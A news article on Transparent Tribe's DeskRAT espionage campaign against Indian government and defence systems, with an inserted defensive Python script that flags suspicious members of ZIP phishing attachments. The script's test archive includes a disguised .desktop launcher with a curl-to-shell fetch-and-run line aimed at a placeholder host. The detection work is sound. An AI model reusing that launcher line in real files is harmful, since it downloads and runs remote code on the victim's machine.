Pakistan Shifts To AI-Based Cyber War; Hackers Target Defence, Govt Systems With Advanced Spyware DeskRAT
The attackers are using official-looking emails, ZIP archives, and documents that mimic government notices. Image courtesy: AI-generated picture via Sora
A major cyber-espionage campaign by a Pakistan-linked hacker group, Transparent Tribe, has raised serious concerns within India’s security establishment. An intelligence agency’s report has alerted the Union Ministry of Home Affairs (MHA) about this miscreant group, which is reported to be targeting government and military networks using an advanced spyware called DeskRAT.
The group has refined its tactics this year. Instead of hosting its operations on public cloud platforms like Google Drive, Transparent Tribe is learnt to have shifted to private servers, which makes its activity harder to detect and block. The group is also reported to be using artificial intelligence and large language models (LLMs) to quickly develop new malware variants.
This gives the attackers a dangerous edge over traditional cybersecurity systems, a News18 report claimed, citing sources. Transparent Tribe hackers are believed to be exploiting ongoing border tensions in Ladakh. Their aim appears to be intercepting intelligence related to China’s military movements by compromising Indian systems.
How are Transparent Tribe hackers targeting govt systems?
According to officials, the attackers are sending phishing emails carrying ZIP archives and documents disguised as government notices and intelligence briefings. These are often timed with border incidents or security alerts to trick officials into downloading infected attachments.
As per a Firstpost report, once installed, DeskRAT, a remote access tool designed for the BOSS Linux systems used in government offices, can secretly monitor, extract, and transmit sensitive files without being noticed. An official further said that these attacks are faster, stealthier, and more difficult to detect.
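The article does not describe how DeskRAT is packaged inside the ZIP lures, so the following is an added example written for this page, not code from the report or any vendor analysis. It shows the kind of attachment triage a mail gateway or SOC script can run on a Linux-targeted ZIP lure: flagging executable extensions, document-lookalike double extensions (notice.pdf.desktop), entries whose Unix mode bits carry an execute permission, hidden path components, and content signatures (ELF header, shebang, a .desktop launcher with an Exec= line, nested archives). The sample archive is constructed in memory for the demonstration, and the example.invalid host in the launcher is a placeholder, not an indicator from the campaign.

```python
import io
import os
import stat
import zipfile

# Extensions that should not appear inside a "government notice" attachment.
EXEC_EXTENSIONS = {".sh", ".desktop", ".run", ".bin", ".elf", ".py", ".pl"}
# Extensions a lure typically imitates (used for double-extension detection).
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".odt", ".txt", ".xls", ".xlsx"}
# Legitimate ZIP-based document formats; other "PK" payloads are nested archives.
ZIP_DOC_EXTENSIONS = {".docx", ".xlsx", ".pptx", ".odt", ".ods", ".odp"}
ELF_MAGIC = b"\x7fELF"
ZIP_MAGIC = b"PK\x03\x04"


def triage_zip(data: bytes) -> list[dict]:
    """Return a list of {name, reasons} for every suspicious member of a ZIP."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            parts = os.path.basename(name).lower().split(".")
            exts = ["." + p for p in parts[1:]]  # all extensions, e.g. [".pdf", ".desktop"]
            reasons = []

            # (1) Executable-type final extension.
            if exts and exts[-1] in EXEC_EXTENSIONS:
                reasons.append(f"executable extension {exts[-1]}")

            # (2) Document-lookalike double extension: briefing.pdf.desktop.
            if len(exts) >= 2 and exts[-2] in DOC_EXTENSIONS and exts[-1] not in DOC_EXTENSIONS:
                reasons.append("document-lookalike double extension")

            # (3) Hidden directory or file component (".cache/helper").
            if any(seg.startswith(".") for seg in name.split("/") if seg):
                reasons.append("hidden path component")

            # (4) Unix mode bits live in the high 16 bits of external_attr.
            mode = (info.external_attr >> 16) & 0xFFFF
            if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                reasons.append(f"execute bit set (mode {oct(mode & 0o777)})")

            # (5) Content signatures from the first bytes of the member.
            with zf.open(info) as fh:
                head = fh.read(512)
            if head.startswith(ELF_MAGIC):
                reasons.append("ELF header")
            elif head.startswith(b"#!"):
                reasons.append("shebang script")
            elif head.startswith(ZIP_MAGIC) and (not exts or exts[-1] not in ZIP_DOC_EXTENSIONS):
                reasons.append("nested archive")
            if b"[Desktop Entry]" in head and b"Exec=" in head:
                reasons.append(".desktop launcher with Exec= line")

            if reasons:
                findings.append({"name": name, "reasons": reasons})
    return findings


def build_sample_attachment() -> bytes:
    """Constructed lure archive for the demo: one benign note, one disguised
    .desktop launcher with the execute bit set, one hidden ELF stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Security_Advisory/Notice.txt", "Please review the attached briefing.\n")
        launcher = zipfile.ZipInfo("Security_Advisory/Intelligence_Briefing.pdf.desktop")
        launcher.external_attr = 0o100755 << 16  # regular file, mode 0755
        zf.writestr(
            launcher,
            "[Desktop Entry]\nType=Application\nName=Briefing\n"
            "Exec=sh -c 'curl -s http://example.invalid/x | sh'\n"  # placeholder host
            "Icon=application-pdf\n",
        )
        # Minimal ELF header bytes only; not a real binary.
        zf.writestr("Security_Advisory/.cache/helper", ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_attachment()):
        print(finding["name"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The checks are deliberately independent so that a lure which defeats one (for example, a launcher shipped without the execute bit and relying on the desktop environment to prompt) is still caught by another; in production the archive would come from the mail pipeline rather than `build_sample_attachment()`, and any hit should quarantine the message rather than merely log it.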
Why has DeskRAT caused a major worry?
Experts warn that automated, real-time threat detection tools will be needed to counter such evolving threats. The goal of the campaign is long-term espionage, not immediate disruption: the malware operates quietly, allowing attackers to steal strategic documents and credentials over weeks or months.
Transparent Tribe has previously been linked to attacks involving Crimson RAT malware, often disguised as security briefings. During the April 2025 Pahalgam terror attack, the group allegedly circulated fake government messages to lure officials.
Following the alert, the MHA has instructed all ministries and defence units to increase cyber vigilance and strengthen security protocols, calling the threat a matter of national security.
Pakistan’s expanding cyber-espionage network
Pakistan’s state-backed hacking ecosystem continues to play a critical role in advancing Islamabad’s strategic and intelligence objectives. Among the most prominent groups is APT36, more commonly known as Transparent Tribe. It has been actively conducting cyber-espionage operations against India, targeting defence personnel, diplomatic missions, and vital infrastructure.
The group’s methods are sophisticated and evolving — from malware-laced documents and watering-hole attacks to social engineering via fake recruitment websites designed to lure unsuspecting officials.
Investigations have also revealed links between APT 36 and other advanced persistent threat (APT) groups such as SideCopy and SideWinder. These entities are known to share digital infrastructure, malware toolkits, and operational patterns, indicating a high level of coordination or common command likely orchestrated by Pakistan’s ISI.